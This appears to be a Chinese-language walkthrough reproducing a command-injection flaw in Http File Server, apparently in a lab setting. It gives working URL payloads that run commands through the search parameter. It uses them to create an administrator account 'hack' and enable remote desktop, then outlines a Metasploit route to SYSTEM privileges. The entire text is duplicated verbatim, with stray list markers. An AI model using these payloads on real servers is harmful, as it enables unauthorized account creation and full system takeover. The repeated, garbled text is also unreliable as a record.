漏洞程式下載下傳位址:Http File Server
這裡說一下,在Windows server 2003中複現時,我直接使用Administrator使用者登入,然後複現,未出現權限問題。再Windows 10中嘗試複現時發現權限不足,需要以管理者權限執行漏洞程式。
運作程式截圖如下
嘗試通路該軟體提供的web服務
web服務是這個樣子的,這個web服務的搜尋處存在漏洞
一、手工利用
payload如下
http://127.0.0.1/?search==%00{.exec|cmd /c 此處替換為dos指令.}
http://127.0.0.1/?search==%00{.exec|cmd /c 此處替換為dos指令.}
- 1
- 2
完整利用過程如下
使用如下payload添加一個管理者賬戶
http://127.0.0.1/?search==%00{.exec|cmd /c net user hack 123 /add.}
- 1
添加使用者:hack
密碼:123
将使用者hack添加到Administrators組。
http://127.0.0.1/?search==%00{.exec|cmd /c net localgroup Administrators hack /add.}
- 1
開啟3389遠端端口
使用遠端連接配接工具連接配接,連接配接成功。
2、使用msf利用
啟動Metasploit,搜尋hfs漏洞利用子產品
加載子產品,并設定目标IP
設定payload,以及本機IP
開始執行
成功獲得system權限
漏洞程式下載下傳位址:Http File Server
這裡說一下,在Windows server 2003中複現時,我直接使用Administrator使用者登入,然後複現,未出現權限問題。再Windows 10中嘗試複現時發現權限不足,需要以管理者權限執行漏洞程式。
運作程式截圖如下
嘗試通路該軟體提供的web服務
web服務是這個樣子的,這個web服務的搜尋處存在漏洞
一、手工利用
payload如下
http://127.0.0.1/?search==%00{.exec|cmd /c 此處替換為dos指令.}
http://127.0.0.1/?search==%00{.exec|cmd /c 此處替換為dos指令.}
- 1
- 2
完整利用過程如下
使用如下payload添加一個管理者賬戶
http://127.0.0.1/?search==%00{.exec|cmd /c net user hack 123 /add.}
- 1
添加使用者:hack
密碼:123
将使用者hack添加到Administrators組。
http://127.0.0.1/?search==%00{.exec|cmd /c net localgroup Administrators hack /add.}
- 1
開啟3389遠端端口
使用遠端連接配接工具連接配接,連接配接成功。
2、使用msf利用
啟動Metasploit,搜尋hfs漏洞利用子產品
加載子產品,并設定目标IP
設定payload,以及本機IP
開始執行
成功獲得system權限